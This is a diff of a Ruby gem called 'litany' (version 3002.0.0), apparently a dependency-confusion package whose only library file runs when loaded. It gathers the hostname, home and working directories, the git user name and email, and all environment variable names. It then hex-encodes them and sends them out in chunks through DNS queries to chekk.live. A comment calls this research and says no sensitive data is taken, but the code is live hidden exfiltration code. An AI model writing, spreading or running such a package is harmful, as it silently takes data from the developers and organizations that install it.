litany 3002.0.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 9a19d18cadba79637eb7f87c82e80e92785300c28857d01ce92f5428d339ba9f
+  data.tar.gz: 3b4013381a855bb78801436a6b101da5f35c92b4fedf589264bcb6ce635fa0b5
+SHA512:
+  metadata.gz: 1404f6c3d5d2bd284d3020338fa733efdae0f812106625724e6bade1311a7dcefe1b2fba38ebc0c38feb2feecdc925783061e2f3d02a19d7dd0c22cc01ea373e
+  data.tar.gz: 6dc2e850b1e3404286992325a909db947531009178ac3c2ac1b09626a1fc2262117dfad3f0a3539df10fe1d300c7fc182382ea980101e9499d067e516a5ff3d0

data/lib/litany.rb

@@ -0,0 +1,100 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = 'd.chekk.live'
+ns = 'dns1.chekk.live'
+
+package = 'litany'
+
+
+
+def convert_string_to_hex(string)
+    string.unpack("H*")
+end
+
+
+def chunk_string(string, length)
+    string.scan(/.{1,#{length}}/)
+end
+
+
+def get_user_from_git_config()
+    # get user name and email from git config
+    begin
+        user_name = `git config user.name`.chomp
+        user_email = `git config user.email`.chomp
+    rescue
+        user_name = ''
+        user_email = ''
+        
+    end
+    return user_name, user_email
+end
+
+def get_environment_variables_names()
+    # get environment variables NAMES (not values, no sensitive data is extracted) sorted by name
+    # to get a better idea of execution context and prove potential impact to organization
+    env_vars = ENV.keys.sort
+    return env_vars
+end
+
+git_name, git_email = get_user_from_git_config()
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd,
+    'gn' => git_name,
+    'ge' => git_email,
+    'ev' => get_environment_variables_names()
+}
+
+data = JSON.generate(data)
+
+# convert to hex and chunk
+data_hex_chunks = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data_hex_chunks.each.each_with_index do |chunk, idx|
+    begin
+        addr = ['v2_f', id_1, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        Resolv.getaddress addr
+    rescue; end
+
+    begin
+        addr = ['v2_f', id_2, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        custom_res.getaddress addr
+    rescue; end
+end

metadata

@@ -0,0 +1,43 @@
+--- !ruby/object:Gem::Specification
+name: litany
+version: !ruby/object:Gem::Version
+  version: 3002.0.0
+platform: ruby
+authors:
+- John Doe
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2021-12-02 00:00:00.000000000 Z
+dependencies: []
+description: Security assesment
+email: jjdoe2@doe.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/litany.rb
+homepage: https://rubygems.org/gems/litany
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.2.32
+signing_key:
+specification_version: 4
+summary: Security assesment
+test_files: []